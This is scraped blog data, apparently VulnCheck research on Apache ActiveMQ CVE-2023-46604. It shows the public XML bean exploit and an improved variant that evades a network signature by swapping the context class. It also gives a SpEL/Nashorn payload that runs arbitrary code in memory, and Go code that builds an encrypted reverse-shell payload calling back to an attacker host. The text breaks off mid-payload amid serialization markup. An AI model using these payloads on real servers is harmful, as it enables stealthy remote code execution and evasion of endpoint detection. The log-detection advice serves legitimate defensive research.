var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":84736},[84737,84738,84739,84740,84747],{"id":84089,"depth":220,"text":84090},{"id":84144,"depth":220,"text":84145},{"id":1902,"depth":220,"text":1903},{"id":84260,"depth":220,"text":84261,"children":84741},[84742,84743,84744,84745,84746],{"id":84276,"depth":1266,"text":84277},{"id":84365,"depth":1266,"text":84366},{"id":84487,"depth":1266,"text":84488},{"id":84504,"depth":1266,"text":84505},{"id":84613,"depth":1266,"text":84614},{"id":201,"depth":220,"text":202},"VulnCheck scans the Go module ecosystem for module repositories affected by repojacking, and discover hundreds of thousands of affected module-versions.",{"slug":84750},"go-repojacking","\u002Fblog\u002Fgo-repojacking",{"title":84035,"description":84748},"blog\u002Fgo-repojacking","6zz94HBaheDmeUqcfUmvf_qPvi24FAUc-bAZOn-FoeM",{"id":84756,"title":83349,"articles":84757,"authors":84779,"body":84781,"date":84761,"description":85781,"extension":234,"image":7,"link":7,"meta":85782,"navigation":237,"path":85784,"seo":85785,"series":7,"stem":85786,"subtype":7,"tags":85787,"__hash__":85788},"blog\u002Fblog\u002Fcve-2023-44604-activemq-in-memory.md",[84758,84762,84765,84769,84772,84776],{"title":84759,"source":39566,"link":84760,"date":84761},"Cyberespionage services sort themselves out during a time of hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F218","2023-11-15",{"title":84763,"source":14382,"link":84764,"date":84761},"New PoC Exploit for Apache ActiveMQ Flaw Could Let Attackers Fly Under the Radar","https:\u002F\u002Fthehackernews.com\u002F2023\u002F11\u002Fnew-poc-exploit-for-apache-activemq.html",{"title":84766,"source":11218,"link":84767,"date":84768},"Dangerous Apache ActiveMQ Exploit Allows Stealthy EDR Bypass","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fdangerous-apache-activemq-exploit-edr-bypass","2023-11-16",{"title":84770,"source":11233,"link":84771,"date":84768},"Concealed attacks likely with new Apache Active MQ exploit","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fconcealed-attacks-likely-with-new-apache-active-mq-exploit",{"title":84773,"source":3494,"link":84774,"date":84775},"Risky Biz News: FCC adopts SIM-swapping and port-out protections","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Ffcc-adopts-sim-swapping-port-out-protections?utm_source=post-email-title&publication_id=852612&post_id=138926737&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email","2023-11-17",{"title":84777,"source":14378,"link":84778,"date":84775},"In Other News: Major Law Firm Hacked, Chinese Bank Pays Ransom, PyPI Security Audit","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-major-law-firm-hacked-chinese-bank-pays-ransom-pypi-security-audit\u002F",[84780],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":84782,"toc":85773},[84783,84786,84788,84828,84832,84859,85100,85151,85161,85164,85168,85179,85185,85198,85204,85372,85393,85396,85407,85423,85426,85430,85438,85570,85584,85587,85742,85744,85753,85755,85770],[263,84784],{":list":84785,"ico":266,"title":83349},"[\"CVE-2023-46604 allows attackers to execute arbitrary code from ActiveMQ’s memory, therefore avoiding most detections.\",\"There were no public details or detections for this exploitation method until this blog.\",\"A memory-resident attacker is very difficult to detect. It’s best to ensure your ActiveMQ instances are not internet-facing.\"]",[61,84787,11648],{"id":11647},[18,84789,84790,1246,84795,1255,84799,84804,84805,10515,84810,84814,84815,84817,84818,1554,84821,84824,84825,59],{},[47,84791,84794],{"href":84792,"rel":84793},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fcritical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604",[51],"Huntress Labs",[47,84796,33465],{"href":84797,"rel":84798},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2023\u002F11\u002F01\u002Fetr-suspected-exploitation-of-apache-activemq-cve-2023-46604\u002F",[51],[47,84800,84803],{"href":84801,"rel":84802},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Ftellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware\u002F",[51],"ArticWolf"," all recently published reports of threat actors exploiting ",[47,84806,84809],{"href":84807,"rel":84808},"https:\u002F\u002Factivemq.apache.org\u002F",[51],"ActiveMQ",[47,84811,10429],{"href":84812,"rel":84813},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-46604",[51]," to drop ransomware onto the victim host. The attackers used CVE-2023-46604 to invoke ",[886,84816,14509],{}," followed by ",[886,84819,84820],{},"curl.exe",[886,84822,84823],{},"msiexec.exe"," in order to download and execute their ransomware. The attackers were very obvious and caught the aforementioned companies' attention, all of which offer managed detection and response products. However, the attacks needn’t have been so noisy. In this blog, we will explore how an attacker can exploit CVE-2023-46604 and execute arbitrary code ",[1131,84826,84827],{},"from memory",[61,84829,84831],{"id":84830},"public-exploits","Public Exploits",[18,84833,84834,84835,84840,84841,84846,84847,84852,84853,84858],{},"The threat actors all appeared to have relied on the public details for this vulnerability. The exploit was originally disclosed in a Chinese-language blog by ",[47,84836,84839],{"href":84837,"rel":84838},"https:\u002F\u002Fexp10it.cn\u002F2023\u002F10\u002Fapache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90\u002F",[51],"X1R0z"," on October 25, 2023 and then re-analyzed by ",[47,84842,84845],{"href":84843,"rel":84844},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002FIHsgZDE3tS\u002Fcve-2023-46604\u002Frapid7-analysis",[51],"Stephen Fewer"," of Rapid7 on November 1, 2023. They both, more or less, came up with an exploit that used ",[47,84848,84851],{"href":84849,"rel":84850},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002Fcurrent\u002Fjavadoc-api\u002Forg\u002Fspringframework\u002Fcontext\u002Fsupport\u002FClassPathXmlApplicationContext.html",[51],"ClassPathXmlApplicationContext"," to load an ",[47,84854,84857],{"href":84855,"rel":84856},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002F4.2.x\u002Fspring-framework-reference\u002Fhtml\u002Fxsd-configuration.html",[51],"XML Bean"," that looks like this:",[1354,84860,84862],{"className":56326,"code":84861,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n \u003Cbeans xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n xsi:schemaLocation=\"\n http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n \u003Cbean id=\"pb\" class=\"java.lang.ProcessBuilder\" init-method=\"start\">\n \u003Cconstructor-arg >\n \u003Clist>\n \u003Cvalue>cmd.exe\u003C\u002Fvalue>\n \u003Cvalue>\u002Fc\u003C\u002Fvalue>\n \u003Cvalue>calc.exe\u003C\u002Fvalue>\n \u003C\u002Flist>\n \u003C\u002Fconstructor-arg>\n \u003C\u002Fbean>\n \u003C\u002Fbeans>\n",[886,84863,84864,84894,84912,84931,84945,84954,84997,85007,85015,85032,85049,85066,85075,85083,85092],{"__ignoreMap":219},[1373,84865,84866,84868,84870,84872,84874,84876,84879,84881,84884,84886,84888,84890,84892],{"class":1375,"line":1376},[1373,84867,2323],{"class":1383},[1373,84869,56328],{"class":6300},[1373,84871,45880],{"class":8252},[1373,84873,5417],{"class":1383},[1373,84875,183],{"class":1387},[1373,84877,84878],{"class":1391},"1.0",[1373,84880,183],{"class":1387},[1373,84882,84883],{"class":8252}," encoding",[1373,84885,5417],{"class":1383},[1373,84887,183],{"class":1387},[1373,84889,27674],{"class":1391},[1373,84891,183],{"class":1387},[1373,84893,2347],{"class":1383},[1373,84895,84896,84898,84901,84903,84905,84907,84910],{"class":1375,"line":220},[1373,84897,8246],{"class":1383},[1373,84899,84900],{"class":6300},"beans",[1373,84902,51807],{"class":8252},[1373,84904,5417],{"class":1383},[1373,84906,183],{"class":1387},[1373,84908,84909],{"class":1391},"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans",[1373,84911,19057],{"class":1387},[1373,84913,84914,84917,84919,84922,84924,84926,84929],{"class":1375,"line":1266},[1373,84915,84916],{"class":8252}," xmlns",[1373,84918,4606],{"class":51986},[1373,84920,84921],{"class":8252},"xsi",[1373,84923,5417],{"class":1383},[1373,84925,183],{"class":1387},[1373,84927,84928],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance",[1373,84930,19057],{"class":1387},[1373,84932,84933,84936,84938,84941,84943],{"class":1375,"line":1852},[1373,84934,84935],{"class":8252}," xsi",[1373,84937,4606],{"class":51986},[1373,84939,84940],{"class":8252},"schemaLocation",[1373,84942,5417],{"class":1383},[1373,84944,19057],{"class":1387},[1373,84946,84947,84950,84952],{"class":1375,"line":4692},[1373,84948,84949],{"class":1391}," http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd",[1373,84951,183],{"class":1387},[1373,84953,6765],{"class":1383},[1373,84955,84956,84958,84961,84963,84965,84967,84970,84972,84974,84976,84978,84981,84983,84986,84988,84990,84993,84995],{"class":1375,"line":4724},[1373,84957,46606],{"class":1383},[1373,84959,84960],{"class":6300},"bean",[1373,84962,7911],{"class":8252},[1373,84964,5417],{"class":1383},[1373,84966,183],{"class":1387},[1373,84968,84969],{"class":1391},"pb",[1373,84971,183],{"class":1387},[1373,84973,27205],{"class":8252},[1373,84975,5417],{"class":1383},[1373,84977,183],{"class":1387},[1373,84979,84980],{"class":1391},"java.lang.ProcessBuilder",[1373,84982,183],{"class":1387},[1373,84984,84985],{"class":8252}," init-method",[1373,84987,5417],{"class":1383},[1373,84989,183],{"class":1387},[1373,84991,84992],{"class":1391},"start",[1373,84994,183],{"class":1387},[1373,84996,6765],{"class":1383},[1373,84998,84999,85001,85004],{"class":1375,"line":4756},[1373,85000,46655],{"class":1383},[1373,85002,85003],{"class":6300},"constructor-arg",[1373,85005,85006],{"class":1383}," >\n",[1373,85008,85009,85011,85013],{"class":1375,"line":4768},[1373,85010,46655],{"class":1383},[1373,85012,49165],{"class":6300},[1373,85014,6765],{"class":1383},[1373,85016,85017,85019,85022,85024,85026,85028,85030],{"class":1375,"line":4792},[1373,85018,46674],{"class":1383},[1373,85020,85021],{"class":6300},"value",[1373,85023,5384],{"class":1383},[1373,85025,14509],{"class":4640},[1373,85027,46627],{"class":1383},[1373,85029,85021],{"class":6300},[1373,85031,6765],{"class":1383},[1373,85033,85034,85036,85038,85040,85043,85045,85047],{"class":1375,"line":4798},[1373,85035,46674],{"class":1383},[1373,85037,85021],{"class":6300},[1373,85039,5384],{"class":1383},[1373,85041,85042],{"class":4640},"\u002Fc",[1373,85044,46627],{"class":1383},[1373,85046,85021],{"class":6300},[1373,85048,6765],{"class":1383},[1373,85050,85051,85053,85055,85057,85060,85062,85064],{"class":1375,"line":4806},[1373,85052,46674],{"class":1383},[1373,85054,85021],{"class":6300},[1373,85056,5384],{"class":1383},[1373,85058,85059],{"class":4640},"calc.exe",[1373,85061,46627],{"class":1383},[1373,85063,85021],{"class":6300},[1373,85065,6765],{"class":1383},[1373,85067,85068,85071,85073],{"class":1375,"line":4817},[1373,85069,85070],{"class":1383}," \u003C\u002F",[1373,85072,49165],{"class":6300},[1373,85074,6765],{"class":1383},[1373,85076,85077,85079,85081],{"class":1375,"line":4825},[1373,85078,85070],{"class":1383},[1373,85080,85003],{"class":6300},[1373,85082,6765],{"class":1383},[1373,85084,85085,85088,85090],{"class":1375,"line":4835},[1373,85086,85087],{"class":1383}," \u003C\u002F",[1373,85089,84960],{"class":6300},[1373,85091,6765],{"class":1383},[1373,85093,85094,85096,85098],{"class":1375,"line":4843},[1373,85095,56557],{"class":1383},[1373,85097,84900],{"class":6300},[1373,85099,6765],{"class":1383},[18,85101,85102,85103,85106,85107,1246,85111,1246,85115,1246,85120,1246,85125,1246,85130,1246,85135,1246,85140,1246,85145,85150],{},"The above XML bean causes ActiveMQ to call ",[886,85104,85105],{},"java.langProcessBuilder(“cmd.exe”, “\u002Fc”, “calc.exe”);"," - resulting in ActiveMQ launching the calculator process. There have been quite a few other public exploits (",[47,85108,36852],{"href":85109,"rel":85110},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F18501\u002Ffiles",[51],[47,85112,22175],{"href":85113,"rel":85114},"https:\u002F\u002Fraw.githubusercontent.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fmain\u002Fnetwork\u002Fcves\u002F2023\u002FCVE-2023-46604.yaml",[51],[47,85116,85119],{"href":85117,"rel":85118},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F90299d8578e8",[51],"XDB-90299d8578e8",[47,85121,85124],{"href":85122,"rel":85123},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F07dca85f6442",[51],"XDB-07dca85f6442",[47,85126,85129],{"href":85127,"rel":85128},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2a263bac5fa9",[51],"XDB-2a263bac5fa9",[47,85131,85134],{"href":85132,"rel":85133},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fc01880ea274b",[51],"XDB-c01880ea274b",[47,85136,85139],{"href":85137,"rel":85138},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F5f38a93c3fe0",[51],"XDB-5f38a93c3fe0",[47,85141,85144],{"href":85142,"rel":85143},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F0462e934919b",[51],"XDB-0462e934919b",[47,85146,85149],{"href":85147,"rel":85148},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F7adf2c60412f",[51],"XDB-7adf2c60412f",") but none deviate from this path.",[18,85152,85153,85154,85157,85158,27987],{},"The perceived restriction is that the attacker must use a bean that accepts all of its configuration through its constructor and has a function that can be invoked via the ",[886,85155,85156],{},"init-method"," parameter (or ",[886,85159,85160],{},"destroy",[18,85162,85163],{},"However, none of those restrictions actually exist.",[61,85165,85167],{"id":85166},"creating-a-better-exploit","Creating a Better Exploit",[18,85169,85170,85171,14193,85173,85178],{},"The first detail worth noting is that the attacker doesn’t have to use ",[886,85172,84851],{},[47,85174,85177],{"href":85175,"rel":85176},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002Fcurrent\u002Fjavadoc-api\u002Forg\u002Fspringframework\u002Fcontext\u002Fsupport\u002FFileSystemXmlApplicationContext.html",[51],"FileSystemXmlApplicationContext"," works just fine. The output barely changes on the wire.",[18,85180,85181],{},[68,85182],{":width":10862,"alt":85183,"src":85184},"CVE-2023-46604 on the wire","\u002Fblog\u002Fcve-2023-44604-activemq-in-memory\u002Fcve-2023-44604-otw.png",[18,85186,85187,85188,85192,85193,85195,85196,59],{},"It’s important to note because existing network signatures (see ",[47,85189,85191],{"href":39489,"rel":85190},[51],"sid:2049045",") rely on ",[886,85194,84851],{}," being present. So we get a simple signature bypass by using ",[886,85197,85177],{},[18,85199,85200,85201,85203],{},"When it comes to the XML bean, we don’t actually need most of what the public exploits use. We don’t need to construct a bean or invoke a function via ",[886,85202,85156],{},". We just need to use SpEL.",[1354,85205,85207],{"className":56326,"code":85206,"language":56328,"meta":219,"style":219},"\u003Cbeans xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\" xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xsi:schemaLocation=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n \u003Cproperty name=\"vc\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('var fw = new java.io.FileWriter("\u002Ftmp\u002F3"); fw.write("Hello VulnCheck"); fw.close();')}\"\u002F>\n \u003C\u002Fbean>\n\u003C\u002Fbeans>\n",[886,85208,85209,85257,85286,85356,85364],{"__ignoreMap":219},[1373,85210,85211,85213,85215,85217,85219,85221,85223,85225,85227,85229,85231,85233,85235,85237,85239,85242,85244,85246,85248,85250,85253,85255],{"class":1375,"line":1376},[1373,85212,11852],{"class":1383},[1373,85214,84900],{"class":6300},[1373,85216,51807],{"class":8252},[1373,85218,5417],{"class":1383},[1373,85220,183],{"class":1387},[1373,85222,84909],{"class":1391},[1373,85224,183],{"class":1387},[1373,85226,51807],{"class":8252},[1373,85228,4606],{"class":51986},[1373,85230,84921],{"class":8252},[1373,85232,5417],{"class":1383},[1373,85234,183],{"class":1387},[1373,85236,84928],{"class":1391},[1373,85238,183],{"class":1387},[1373,85240,85241],{"class":8252}," xsi",[1373,85243,4606],{"class":51986},[1373,85245,84940],{"class":8252},[1373,85247,5417],{"class":1383},[1373,85249,183],{"class":1387},[1373,85251,85252],{"class":1391},"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd",[1373,85254,183],{"class":1387},[1373,85256,6765],{"class":1383},[1373,85258,85259,85261,85263,85265,85267,85269,85271,85273,85275,85277,85279,85282,85284],{"class":1375,"line":220},[1373,85260,8246],{"class":1383},[1373,85262,84960],{"class":6300},[1373,85264,7911],{"class":8252},[1373,85266,5417],{"class":1383},[1373,85268,183],{"class":1387},[1373,85270,19383],{"class":1391},[1373,85272,183],{"class":1387},[1373,85274,27205],{"class":8252},[1373,85276,5417],{"class":1383},[1373,85278,183],{"class":1387},[1373,85280,85281],{"class":1391},"java.lang.String",[1373,85283,183],{"class":1387},[1373,85285,6765],{"class":1383},[1373,85287,85288,85291,85294,85296,85298,85300,85303,85305,85307,85309,85311,85314,85316,85319,85321,85324,85326,85328,85330,85333,85335,85337,85339,85342,85344,85346,85348,85351,85353],{"class":1375,"line":1266},[1373,85289,85290],{"class":1383}," \u003C",[1373,85292,85293],{"class":6300},"property",[1373,85295,46496],{"class":8252},[1373,85297,5417],{"class":1383},[1373,85299,183],{"class":1387},[1373,85301,85302],{"class":1391},"vc",[1373,85304,183],{"class":1387},[1373,85306,49451],{"class":8252},[1373,85308,5417],{"class":1383},[1373,85310,183],{"class":1387},[1373,85312,85313],{"class":1391},"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('var fw = new java.io.FileWriter(",[1373,85315,7218],{"class":7054},[1373,85317,85318],{"class":2209},"quot",[1373,85320,39663],{"class":7054},[1373,85322,85323],{"class":1391},"\u002Ftmp\u002F3",[1373,85325,7218],{"class":7054},[1373,85327,85318],{"class":2209},[1373,85329,39663],{"class":7054},[1373,85331,85332],{"class":1391},"); fw.write(",[1373,85334,7218],{"class":7054},[1373,85336,85318],{"class":2209},[1373,85338,39663],{"class":7054},[1373,85340,85341],{"class":1391},"Hello VulnCheck",[1373,85343,7218],{"class":7054},[1373,85345,85318],{"class":2209},[1373,85347,39663],{"class":7054},[1373,85349,85350],{"class":1391},"); fw.close();')}",[1373,85352,183],{"class":1387},[1373,85354,85355],{"class":1383},"\u002F>\n",[1373,85357,85358,85360,85362],{"class":1375,"line":1852},[1373,85359,56557],{"class":1383},[1373,85361,84960],{"class":6300},[1373,85363,6765],{"class":1383},[1373,85365,85366,85368,85370],{"class":1375,"line":4692},[1373,85367,46627],{"class":1383},[1373,85369,84900],{"class":6300},[1373,85371,6765],{"class":1383},[18,85373,85374,85375,1554,85377,85379,85380,85382,85383,85388,85389,85392],{},"In the XML bean above, you can see that we’ve embedded a SpEL expression to invoke the Nashorn javascript engine and write a file to disk. The payload does not shell out to ",[886,85376,14509],{},[886,85378,2197],{}," to write to disk. It just uses the native functionality in the ",[886,85381,82664],{}," process. Spring, ",[47,85384,85387],{"href":85385,"rel":85386},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Freference\u002Fcore\u002Fexpressions\u002Fbeandef.html",[51],"by design",", allows for SpEL in bean definitions. As a feature, we can execute arbitrary code ",[1131,85390,85391],{},"as the original process",". We don’t need to shell out to a new process at all!",[18,85394,85395],{},"That means the threat actors could have avoided dropping their tools to disk. They could have just written their encryptor in Nashorn (or loaded a class\u002FJAR into memory) and remained memory resident. Perhaps avoiding detection from the aforementioned managed EDR teams.",[18,85397,85398,85399,85402,85403,85406],{},"However, if the attacker ",[1131,85400,85401],{},"did"," do that, they’d also need to clean up the ",[886,85404,85405],{},"activemq.log"," because the above XML triggers the following log message (note that:",[1925,85408,85409],{},[18,85410,85411,85412,85418,85419,85422],{},"2023-11-11 140510,839 | WARN | Exception encountered during context initialization - canceling refresh attempt: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'vulncheck' defined in URL ",[1373,85413,85414],{},[47,85415,85416],{"href":85416,"rel":85417},"http:\u002F\u002F10.9.49.131:8080\u002FbppkArhoWrRn",[51]," : Initialization of bean failed; nested exception is org.springframework.beans.factory.BeanExpressionException: Expression parsing failed; nested exception is org.springframework.expression.ExpressionInvocationTargetException: A problem occurred when trying to execute method 'eval' on object of type ",[1373,85420,85421],{},"jdk.nashorn.api.scripting.NashornScriptEngine"," | org.springframework.context.support.FileSystemXmlApplicationContext | ActiveMQ Transport: tcp:\u002F\u002F\u002F10.9.49.131:57484@61616",[18,85424,85425],{},"Generally speaking, you never want to see Nashorn in your logs. You really don’t want to see it associated with BeanCreation. Note that the nested exception will not always include a “Nashorn` exception, so detection should occur around the remote BeanCreationException.",[61,85427,85429],{"id":85428},"a-reverse-shell","A Reverse Shell",[18,85431,85432,85433,1554,85435,85437],{},"The overarching objective of this blog was executing arbitrary code in memory. However, I’m informed people would be disappointed if they didn’t get a reverse shell payload. Remember, when you use this reverse shell, you are using ",[886,85434,2197],{},[886,85436,14509],{},"... which is the exact thing that caught Huntress, Rapid7, and ArticFox’s attention in the first place. But here you go anyway:",[1354,85439,85441],{"className":19022,"code":85440,"language":19024,"meta":219,"style":219},"xml := fmt.Sprintf(`\u003Cbeans\n xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n xsi:schemaLocation=\"\n http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n \u003Cproperty name=\"file\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new java.lang.String(java.util.Base64.decoder.decode("%s")));')}\"\u002F>\n \u003C\u002Fbean>\n \u003C\u002Fbeans>`, b64.StdEncoding.EncodeToString([]byte(payload.ReverseShellJJSScript(conf.Lhost, conf.Lport, conf.C2Type == c2.SSLShellServer))))\n\n",[886,85442,85443,85463,85468,85473,85478,85483,85488,85498,85503],{"__ignoreMap":219},[1373,85444,85445,85448,85450,85452,85454,85456,85458,85460],{"class":1375,"line":1376},[1373,85446,85447],{"class":4640},"xml ",[1373,85449,20584],{"class":1397},[1373,85451,82848],{"class":4640},[1373,85453,59],{"class":1383},[1373,85455,82853],{"class":7297},[1373,85457,1384],{"class":1383},[1373,85459,19169],{"class":1387},[1373,85461,85462],{"class":1391},"\u003Cbeans\n",[1373,85464,85465],{"class":1375,"line":220},[1373,85466,85467],{"class":1391}," xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n",[1373,85469,85470],{"class":1375,"line":1266},[1373,85471,85472],{"class":1391}," xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n",[1373,85474,85475],{"class":1375,"line":1852},[1373,85476,85477],{"class":1391}," xsi:schemaLocation=\"\n",[1373,85479,85480],{"class":1375,"line":4692},[1373,85481,85482],{"class":1391}," http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n",[1373,85484,85485],{"class":1375,"line":4724},[1373,85486,85487],{"class":1391}," \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n",[1373,85489,85490,85493,85495],{"class":1375,"line":4756},[1373,85491,85492],{"class":1391}," \u003Cproperty name=\"file\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new java.lang.String(java.util.Base64.decoder.decode("",[1373,85494,38048],{"class":37971},[1373,85496,85497],{"class":1391},"")));')}\"\u002F>\n",[1373,85499,85500],{"class":1375,"line":4768},[1373,85501,85502],{"class":1391}," \u003C\u002Fbean>\n",[1373,85504,85505,85508,85510,85512,85514,85516,85518,85520,85522,85524,85526,85528,85530,85532,85534,85536,85538,85540,85542,85544,85546,85548,85550,85552,85554,85556,85558,85560,85562,85564,85567],{"class":1375,"line":4792},[1373,85506,85507],{"class":1391}," \u003C\u002Fbeans>",[1373,85509,19169],{"class":1387},[1373,85511,5437],{"class":1383},[1373,85513,82963],{"class":4640},[1373,85515,59],{"class":1383},[1373,85517,82968],{"class":4640},[1373,85519,59],{"class":1383},[1373,85521,82973],{"class":7297},[1373,85523,82976],{"class":1383},[1373,85525,82979],{"class":7293},[1373,85527,1384],{"class":1383},[1373,85529,11736],{"class":4640},[1373,85531,59],{"class":1383},[1373,85533,82905],{"class":7297},[1373,85535,1384],{"class":1383},[1373,85537,38107],{"class":4640},[1373,85539,59],{"class":1383},[1373,85541,38239],{"class":4640},[1373,85543,5437],{"class":1383},[1373,85545,20633],{"class":4640},[1373,85547,59],{"class":1383},[1373,85549,38248],{"class":4640},[1373,85551,5437],{"class":1383},[1373,85553,20633],{"class":4640},[1373,85555,59],{"class":1383},[1373,85557,38189],{"class":4640},[1373,85559,15920],{"class":1397},[1373,85561,38199],{"class":4640},[1373,85563,59],{"class":1383},[1373,85565,85566],{"class":4640},"SSLShellServer",[1373,85568,85569],{"class":1383},"))))\n",[18,85571,85572,85573,85578,85579,85583],{},"Note that ",[47,85574,85577],{"href":85575,"rel":85576},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F62833721dab65674281d5a82abe37816d742f358\u002Fpayload\u002Freverse.go#L81",[51],"payload.ReverseShellJSSScript"," is from ",[47,85580,20558],{"href":85581,"rel":85582},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain",[51],", and automatically supports Windows and Linux targets, as well as encryption.",[18,85585,85586],{},"The whole thing looks like this on the wire:",[1354,85588,85590],{"className":56326,"code":85589,"language":56328,"meta":219,"style":219},"\u003Cbeans\n xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n xsi:schemaLocation=\"\n http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n \u003Cproperty name=\"file\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new 